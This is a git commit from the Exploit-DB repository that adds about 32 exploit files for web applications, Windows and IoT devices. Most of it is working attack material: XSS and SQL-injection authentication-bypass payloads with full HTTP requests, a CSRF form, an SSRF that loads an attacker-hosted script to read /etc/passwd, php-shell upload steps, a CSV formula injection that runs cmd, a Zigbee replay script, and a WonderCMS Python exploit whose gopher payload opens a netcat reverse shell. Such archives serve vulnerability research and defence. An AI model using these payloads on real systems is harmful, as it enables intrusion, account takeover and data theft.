DB: 2020-12-03

32 changes to exploits/shellcodes

aSc TimeTables 2021.6.2 - Denial of Service (PoC)
IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path
Microsoft Windows - Win32k Elevation of Privilege
Ksix Zigbee Devices - Playback Protection Bypass (PoC)
Mitel mitel-cs018 - Call Data Information Disclosure
Expense Management System - 'description' Stored Cross Site Scripting
ILIAS Learning Management System 4.3 - SSRF
Pharmacy Store Management System 1.0 - 'id' SQL Injection
Under Construction Page with CPanel 1.0 - SQL injection
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
Student Result Management System 1.0 - Authentication Bypass SQL Injection
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
WonderCMS 3.1.3 - Authenticated Remote Code Execution
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
NewsLister - Authenticated Persistent Cross-Site Scripting
Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting
Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Add Artwork
Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
DotCMS 20.11 - Stored Cross-Site Scripting
WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
ChurchCRM 4.2.0 - CSV/Formula Injection
ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)
Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality
Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover
Simple College Website 1.0 - 'page' Local File Inclusion
Car Rental Management System 1.0 - SQL Injection / Local File include
WordPress Plugin Wp-FileManager 6.8 - RCE
This commit is contained in:
Offensive Security 2020-12-03 05:01:56 +00:00
parent 4b9e53700f
commit 0ffa4d35c4
33 changed files with 1317 additions and 0 deletions

View file

@ -0,0 +1,43 @@
# Exploit Title: Mitel mitel-cs018 - Call Data Information Disclosure
# Date: 2003-07-28
# Exploit Author: Andrea Intilangelo (acme olografix / paranoici)
# Vendor Homepage: www.mitel.com
# Version: mitel-cs018
# Tested on: Windows, Linux
There is an interesting bug in a Mitel's servers for Voice over IP that allows to discover the numbers called and the numbers calling trought this dhcp server. This server is configurable via http interface and via telnet; in this case, if there is a call at moment of login/pass request, I've noted this:
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
Username: mitel-cs018
Password:
ERROR: Invalid Username/Password pair
Username:
Password:
Username: ^X^W^E^Q^W
Password:
ERROR: Invalid Username/Password pair
Username: Password:
ERROR: Invalid Username/Password pair
# in this moment a foreign call arrive from outside
Username: 155 OGIN 149 11:11:55 D 2
156 ICIN 11:12: 6 D 4 0xxxXxxxxx
157 XFIC 156 11:12: 6 151 0: 9:47 D 3
158 ICIN 11:12: 6 D 3 0xxxXxxxxx
159 ANSW 146 11:12:11 0: 0: 9 D 4
160 HDIN 146 11:12:21 D 4
162 HREC 146 11:12:27 0: 0: 6 D 4
163 ABND ? 11:12:37 0: 0:37 D 3 0xxxXxxxxx
164 ICIN 11:12:43 D 3 0xxxXxxxxx
165 EXIC 146 11:12:54 0: 0:47 D 4
166 ANSW 146 11:13: 0 0: 0:16 D 3
167 HDIN 146 11:13: 6 D 3
169 EXIC 146 11:13:13 156 0: 0:12 D 3
171 EXOG 149 11:13:46 0: 1:59 D 2 0xxXxxxxx
172 XFIC 156 11:16:53 146 0: 3:40 D 3
# where "0xxXxxxxx" are telephone numbers
A derives table results is:
SEQ CODE EXT ACC TIME RX TX DURATION LN DIALLED DIGITS COST
No. No. COD HH:MM:SS FROM TO HH:MM:SS No.
___ _____ ____ ____ ________ ____ ____ ____________ ______________ _______

View file

@ -0,0 +1,95 @@
# Exploit Title: Ksix Zigbee Devices - Playback Protection Bypass (PoC)
# Date: 2020-11-15
# Exploit Author: Alejandro Vazquez Vazquez
# Vendor Homepage: https://www.ksixmobile.com/
# Firmware Version: (Gateway Zigbee Module - v1.0.3, Gateway Main Module - v1.1.2, Door Sensor - v1.0.7, PIR Motion Sensor - v1.0.12)
# Tested on: Kali Linux 2020.3
# The coordinator of the Zigbee network (Zigbee gateway) does not correctly check the sequence number of the packets that are sent to it, which allows forging messages from an end device to the coordinator (example: turn on a light bulb, open a door, ...) by injecting a very large value in the "sequence number" field.
# To exploit this vulnerability
# 1. Capture Zigbee traffic with a sniffer (Api-Mote) and save it in .pcap format
# 2. Open the file with Wireshark and locate the packet you want to forward (turn on a light bulb, open a door, ...)
# 3. Copy that packet as "hex dump" and save it to a .txt file
# 4. Modify the "sequence number" field to a high value such as 250
# 5. Convert the txt file to .pcap again
# 6. Forward the packet to the network, using a tool such as Killerbee
#!/bin/bash
function usage(){
echo -e "\nUsage: $0 [ZigbeeChannel] [SecuenceNumber] [HexDumpFile] [ShortSource] [ExtendedSource] [ShortDestination] [ShortPanId] [FCS]"
echo -e "Example: $0 11 250 Open_Door_Alert_Hex_Dump 0x0001 11:ff:11:ff:11:ff:11:ff 0x0000 0x3333 0x0000 \n"
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}
function message(){
echo -e "\nProof of Concept"
echo -e "There is an incorrect check of the \"sequence number\" field on Ksix Zigbee devices\n"
echo -e "IMPORTANT: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message \"Door open\".\n"
}
function poc_playback(){
# Variables
ZIGBEE_CHANNEL=$1
SECUENCE_NUMBER=$2
HEX_DUMP_FILE=$3
SHORT_SOURCE=$4
EXTENDED_SOURCE=$5
SHORT_DESTINATION=$6
SHORT_PAN_DESTINATION=$7
FRAME_CHECK_SECUENCE=$8
declare -a first_line_array
declare -a second_line_array
declare -a last_line_array
# Change packet fields
while IFS= read -r line
do
if [[ "$line" == "0000"* ]]; then
IFS=' ' read -ra first_line_array <<< "$line"
first_line_array[0]+=" "
first_line_array[3]=$( printf "%x" $SECUENCE_NUMBER )
first_line_array[4]=${SHORT_PAN_DESTINATION:4:2}
first_line_array[5]=${SHORT_PAN_DESTINATION:2:2}
first_line_array[6]=${SHORT_DESTINATION:4:2}; first_line_array[11]=${SHORT_DESTINATION:4:2}
first_line_array[7]=${SHORT_DESTINATION:2:2}; first_line_array[12]=${SHORT_DESTINATION:2:2}
first_line_array[8]=${SHORT_SOURCE:4:2}; first_line_array[13]=${SHORT_SOURCE:4:2}
first_line_array[9]=${SHORT_SOURCE:2:2}; first_line_array[14]=${SHORT_SOURCE:2:2}
echo "${first_line_array[@]}" > Check_Secuence_Number_Incorrectly_HEX_Dump
elif [[ "$line" == "0010"* ]]; then
IFS=' ' read -ra second_line_array <<< "$line"
second_line_array[0]+=" "
second_line_array[7]=${EXTENDED_SOURCE:21:2}; second_line_array[8]=${EXTENDED_SOURCE:18:2}
second_line_array[9]=${EXTENDED_SOURCE:15:2}; second_line_array[10]=${EXTENDED_SOURCE:12:2}
second_line_array[11]=${EXTENDED_SOURCE:9:2}; second_line_array[12]=${EXTENDED_SOURCE:6:2}
second_line_array[13]=${EXTENDED_SOURCE:3:2}; second_line_array[14]=${EXTENDED_SOURCE:0:2}
echo "${second_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
elif [[ "$line" == "0030"* ]]; then
IFS=' ' read -ra last_line_array <<< "$line"
last_line_array[0]+=" "
last_line_array[11]=${FRAME_CHECK_SECUENCE:4:2}
last_line_array[12]=${FRAME_CHECK_SECUENCE:2:2}
echo "${last_line_array[@]}" >> Check_Secuence_Number_Incorrectly_HEX_Dump
else
echo "$line" >> Check_Secuence_Number_Incorrectly_HEX_Dump
fi
done < $HEX_DUMP_FILE
# Hex Dump file to pcap
text2pcap Check_Secuence_Number_Incorrectly_HEX_Dump Check_Secuence_Number_Incorrectly.pcap
# Playback
zbreplay --channel $ZIGBEE_CHANNEL --pcapfile Check_Secuence_Number_Incorrectly.pcap && echo -e "\nPacket sent to the network. Poc Completed.\n"
}
function main(){
if [ $# -lt 8 ]; then
echo -e "\n\t Missing arguments"
usage
exit
else
message
poc_playback $1 $2 $3 $4 $5 $6 $7 $8
fi
}
main $1 $2 $3 $4 $5 $6 $7 $8
#NOTE: This is a script that I developed to understand how an IEEE 802.15.4 / Zigbee packet is formed, modify some fields of the packet in a simple way and see the effect when forwarding it to the network. If you want to exploit the vulnerability, follow the steps that I specify in the comments I make in the script. I exploited the vulnerability by spoofing a packet (sequence number 250) that contained the message "Door open".

View file

@ -0,0 +1,39 @@
# Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting
# Date: 02/12/2020
# Exploit Author: Nikhil Kumar
# Vendor Homepage: http://egavilanmedia.com/
# Software Link: http://egavilanmedia.com/expense-management-system/
# Tested On: Ubuntu
Vunerable Parameter: "description="
Steps to Reproduce:
1. Open the index.php page using following url
http://localhost/Expense-Management-System/index.php
click on Add Expense
2. Put a payload on "description=" parameter
Payload :- test"><script>alert("XSS")</script>
Malicious Request::
POST /Expense-Management-System/expense_action.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 140
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/Expense-Management-System/
Cookie: PHPSESSID=45f122ec98900409467ac74f6113ff4a
description=test%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&amount=1234&date=2020%2F11%2F17&expense_id=&action=Add

View file

@ -0,0 +1,33 @@
# Exploit Title: ILIAS Learning Management System 4.3 - SSRF
# Date: 10-08-2020
# Exploit Author: Dot/kx1z0
# Vendor Homepage: https://www.ilias.de/
# Software Link: https://github.com/ILIAS-eLearning/ILIAS/tree/release_4-3
# Version: 4.3-5.1
# Tested on: Linux
# Description
We can create portfolios, export them to PDF and download them.
The issue is that there is an HTML Injection, and if we inject HTML
into the portfolio, when it is exported to PDF, it will be rendered.
So we can take advantage that it is running under the wrapper file://
to inject an XMLHttpRequest requesting the local file we want, that
when downloading the PDF, we can see the content of that file
# Exploit
We cannot inject the XMLHttpRequest directly into the content of the
portfolio, as there is something blocking it. So we will have to host
a script in our own server and invoke it from the portfolio
We insert this in the portfolio:
<script src=host.com/test.js> </script>
Script in our server:
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
So, finally, we will only have to download the PDF and there, will be
the content of the file we have requested.

View file

@ -0,0 +1,26 @@
# Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection
# Date: 17-11-2020
# Exploit Author: Mayur Parmar(th3cyb3rc0p)
# Vendor Homepage: http://egavilanmedia.com
# Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/
# Version: 1.0
# Tested on: PopOS
SQL Injection:
SQL injection is a web security vulnerability that allows an attacker
to alter the SQL queries made to the database. This can be used to
retrieve some sensitive information, like database structure, tables,
columns, and their underlying data.
Attack Vector:
An attacker can gain admin panel access using malicious sql injection queries.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/Under%20Construction/admin/login.php
2. Now put below Payload in both the fields( User ID & Password)
Payload: admin' or '1'='1
3. Server accepted our payload and we bypassed cpanel without any
credentials

View file

@ -0,0 +1,65 @@
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
# Date: 01-12-2020
# Exploit Author: Hardik Solanki
# Vendor Homepage: http://egavilanmedia.com
# Software Link: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
# Version: 1.0
# Tested on Windows 10
CSRF ATTACK:
Cross-site request forgery (also known as CSRF) is a web security
vulnerability that allows an attacker to induce users to perform actions
that they do not intend to perform. It allows an attacker to partly
circumvent the same-origin policy, which is designed to prevent different
websites from interfering with each other.
Attack Vector:
An attacker can update any user's account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)
Steps to reproduce:
1. Open user login page using the following URL:
->
http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/login.html
2. Now login with the "attacker" user account & navigate to the edit
profile tab. Click on the "Update" button and intercept the request in web
proxy tool called "Burpusite"
3. Generate the CSRF POC from the burp tool. Copy the URL or Copy the below
code.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="
http://localhost/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile_action.php"
method="POST">
<input type="hidden" name="fullname" value="Attacker" />
<input type="hidden" name="username" value="hunterr" />
<input type="hidden" name="email"
value="noooobhunter&#64;gmail&#46;com" />
<input type="hidden" name="gender" value="Male" />
<input type="hidden" name="action" value="update&#95;user" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Now, login with the "Victim/Normal user" account. (Let that user is
currently authenticated in the browser).
5. Paste the URL in the browser, which is copied in step 3. OR submit the
CSRF POC code, which is shown in step 3.
6. We receive a "Status: Success", which indicates that the CSRF attack is
successfully done & the Attacker can takeover the user account via Stored
XSS (Steal the authenticated Cookies of the user from the "FULL NAME"
parameter)
IMPACT:
An attacker can takeover any user account. (Note: FULL NAME field is also
vulnerable to stored XSS & attacker can steal the authenticated Session os
the user)

View file

@ -0,0 +1,32 @@
# Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection
# Google Dork: N/A
# Date: 11/16/2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/
# Software Link: https://projectnotes.org/download/studentms-zip/
# Version: 1.0
# Tested on: Win10 x64, Kali Linux x64
# CVE : N/A
######## Description
#################################################################
#
#
# An SQL injection vulnerability discovered in PHP Student Result Management System #
#
#
# Admin Login Portal is vulnerable to SQL Injection
#
#
#
# The vulnerability could allow for the improper neutralization of special elements #
# in SQL commands and may lead to the product being vulnerable to SQL injection. #
#
#
######################################################################################
Kindly Follow Below Steps:
1. Visit the main page of the Student Result Management System.
2. You will get an Admin Login Page.
3. Payload which you can use in Email and password field:
*AND 1=0 AND '%'='
*4. You will get Admin Access of the Student Result Management System.

View file

@ -0,0 +1,13 @@
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting
# Exploit Author: Soushikta Chowdhury
# Vendor Homepage: http://egavilanmedia.com
# Software Link: http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel/
# Version: 1.0
# Tested on: Windows 10
# Contact: https://www.linkedin.com/in/soushikta-chowdhury/
Vulnerable Parameters: Full Name
Steps for reproduce:
1. Go to registration page
2. fill in the details & put <script>alert("soushikta")</script> payload in Full name.
3. Now goto Admin Panel. After entering go to Manage Users and go to the last page to check the newly added user. We could see that our payload gets executed.

View file

@ -0,0 +1,29 @@
# Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
# Date: 27-11-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/
# Tested on: Windows 10/Kali Linux
Steps-To-Reproduce:
1. Go to register
2. Add the payload in Username : <script>alert(1)</script>
3. And complete the register
4. Login to the account
POST /vote/reg_action.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
Origin: http://localhost
Connection: close
Referer: http://localhost/vote/register.php
Cookie: PHPSESSID=1sqkq0u1m2j47906htd45opcep
Upgrade-Insecure-Requests: 1
firstname=user1&lastname=user2&username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=testtest&g-recaptcha-response=03AGdBq24TB5LilE4y9YCZx4I_XrKLBs2ftYrVEJ70_vhpDG-FXCKhzfB-EmAD-NnhKRSZ8_A88_ZNB4nXnwMBs8cU1Qgrqzs8Yme0Bmral8WRK1umGikJeDzliuigIKgZ6Q2Me9zGS-ecZyrujgF4tKSlMs3K_KNgVhEhlAsslrfBe7jQg40aG3PdMCXTTOst4Lt91vswl1G_dmYjrLEh7AfLJS7XYgXrEt4Pfau_mJ3KzE_hf-MxbpTI9_NkCLanUiW8-VI1t3uopUbSE9xH53X1cUExoe_dGpwnkygZw_4yEDp-iBYA73wql5ow1W43OIn5pmSBz_Sdv1VbfAqbFMEIXXJx4o5D_TLiVKLDQCj2Vy-fRmohlpYwV76NR5Iu2D693FKCs3KODRNSaitpOevSfcYh3h05vCGuPSO1fCu4c3v1daiIdFKPwDvfKS_Lm8jgoFK4kfnZ&submit=Next

View file

@ -0,0 +1,29 @@
# Exploit Title: NewsLister - Authenticated Persistent Cross-Site Scripting
# Date: 2020-11-27
# Exploit Author: Emre Aslan
# Vendor Homepage: https://www.netartmedia.net/newslister.html
# Tested on: Windows & XAMPP
==> PoC <==
1- Login to admin panel.
2- Enter the payload to title value.
3- View the news. XSS will be execute.
==> HTTP Request <==
GET /admin/index.php?page=add HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: host/admin/index.php?page=home
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: AuthUser=administrator~da1907216877e31462c14b35db67de32~1606484275; PHPSESSID=nn5gq66nla4lfs47fq9eoctvuf

View file

@ -0,0 +1,17 @@
# Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
# Date: 26-11-2020
# Exploit Author: Parshwa Bhavsar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14609/bakeshop-online-ordering-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP
Payload : "><img src=x onerror=alert(1)>
Steps to Reproduce :-
1. Login in admin dashboard & Click on 'Categories'.
2. You will notice the "New" button ,Click on that and You will notice the "Category" input field.
3. Put XSS Payload on that field and save it.
4. XSS will be triggered.

View file

@ -0,0 +1,33 @@
# Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
# Date: 24-11-2020
# Exploit Author: Parshwa Bhavsar
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip
# Version: 1.0
# Tested on: Windows 10/XAMPP
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.
Attack Vector :
This vulnerability can result in the attacker to inject the XSS
payload in the Title field of the page and each time any user will
open the website, the XSS triggers and attacker can able to steal the
cookie according to the crafted payload.
Vulnerable Parameters: Title Parameter in Edit Post Page.
Payload : "><img src=x Onmouseover=alert(document.domain)>
Vulnerable URL :
http://localhost/online-news-portal/news_portal/admin/index.php?page=new_post
Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Posts and click Add New button.
3) Put Payload into the Title parameter.
4) Click on Save.
5) XSS payload will be triggered.

View file

@ -0,0 +1,28 @@
# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
# Date: 21/11/2020
# Exploit Author: Aditya Wakhlu
# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
Step 2: use payload Aditya' or 1=1# in user and password field
Malicious Request:::
POST /lssems/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/lssems/admin/login.php
Cookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3
username=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23

View file

@ -0,0 +1,16 @@
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
---------------------
Proof of Concept:
---------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution

View file

@ -0,0 +1,15 @@
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
--------------------
Proof of Concept:
--------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution

View file

@ -0,0 +1,15 @@
# Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting
# Exploit Author: Hardik Solanki
# Vendor Homepage: https://dotcms.com/
# Version: 20.11
# Tested on Windows 10
Vulnerable Parameters: Template Title
Steps to reproduce:
1. Login With Admin Username and password.
2. Navigate to Site --> Template --> Add Template Designer
2. Entre the payload <script>alert(document.cookie)</script> in Template
Title.
3. Now Navigate to Site --> Template. We could see that our payload gets
executed. And hence it executed every time.

View file

@ -0,0 +1,19 @@
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
# Date: 18-11-2020
# Exploit Author: Aakash Madaan
# Vendor Homepage: https://webdamn.com/
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
# Version: N/A (Default)
# Tested on: Windows 10 professional
Steps to reproduce:
1. Open user login page using following URl:
-> http://localhost/login.php <http://localhost/login.html>
2. If attacker get access to valid email address ( leaked data or by any
other means) then he/she can use the email address as follows:
Payload: <email>' OR '1'='1
NOTE: Use the above payload in both username and password fields
3. Server accepts the payload and the attacker is able to bypass the user
login panel with only email address.

View file

@ -0,0 +1,22 @@
#Exploit Title: ChurchCRM 4.2.1- CSV/Formula Injection
#Date: 2020- 10- 24
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.0
#Payload: =10+20+cmd|' /C calc'!A0
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
List Event Types feature in ChurchCRM v4.2.0 via Name field that is
mistreated while exporting to a CSV file.
To exploit this vulnerability:
1. Login to the application, goto 'Events' module and then "List Event
Types"
2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the
'Name' field
3. Now goto 'List Event types' module and click CSV to download the CSV
file
4. Open the CSV file, allow all popups and our payload is executed
(calculator is opened).

View file

@ -0,0 +1,17 @@
#Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS)
#Date: 2020- 10- 29
#Exploit Author: Mufaddal Masalawala
#Vendor Homepage: https://churchcrm.io/
#Software Link: https://github.com/ChurchCRM/CRM
#Version: 4.2.1
#Tested on: Kali Linux 2020.3
#Proof Of Concept:
ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability:
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload ( <script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>
) in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.

View file

@ -0,0 +1,12 @@
# Exploit Title: Pharmacy Store Management System 1.0 - 'id' SQL Injection
# Google Dork: N/A
# Date: 1.12.2020
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/13225/pharmacy-store-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13225&title=Pharmacy+Store+Management+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux
Use SQLMAP:
sqlmap -u 'http://localhost/pharmacy1/admin/edituser?id=1' --dbs --batch

77
exploits/php/webapps/49154.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution
# Date: 2020-11-27
# Exploit Author: zetc0de
# Vendor Homepage: https://www.wondercms.com/
# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip
# Version: 3.1.3
# Tested on: Ubuntu 16.04
# CVE : N/A
# WonderCMS is vulnerable to SSRF Vulnerability.
# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.
# The theme/plugin installer not sanitize the destination of github/gitlab url, so attacker can pointing te destinaition to localhost.
# when the attacker can pointing the request to localhost, this lead to SSRF vulnerability.
# the most high impact lead to RCE with gopher scheme and FastCGI running in port 9000
#
# python exploit.py
# [+] Getting Token
# [+] Sending payload
# [+] Get reverse shell
# nc -lnvp 1234
# Connection from 192.168.43.103:56956
# /bin/sh: 0: can't access tty; job control turned off
# $ whoami
# www-data
# $
import requests
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep
print(colored('''
\ \ /_ \ \ | _ \ __| _ \ __| \ | __|
\ \ \ /( |. | | |_| / ( |\/ |\__ \
\_/\_/\___/_|\_|___/___|_|_\\___|_| _|____/
------[ SSRF to Remote Code Execution ]------
''',"blue"))
loginURL = "http://wonder.com/loginURL"
password = "GpIyq0RH"
lhost = "192.168.43.66"
lport = "1234"
payload = "gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500".format(lhost,lport)
r = requests.session()
data = { "password" : password }
page = r.post(loginURL,data)
if "Wrong" in page.text:
print(colored("[!] Exploit Failed : Wrong Credential","red"))
exit()
print(colored("[+] Getting Token","cyan"))
soup = BeautifulSoup(page.text, "html.parser")
allscript = soup.find_all("script")
no = 0
for i in allscript:
if "rootURL" in str(i):
url = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
elif "token" in str(i):
token = i.string.split("=")[1].replace('"','').strip(";").lstrip(" ")
def sendPayload(req,url,payload,token):
getShell = url + "?installThemePlugin=" + payload + "&type=plugins&token=" + token
req.get(getShell)
print(colored("[+] Sending payload","cyan"))
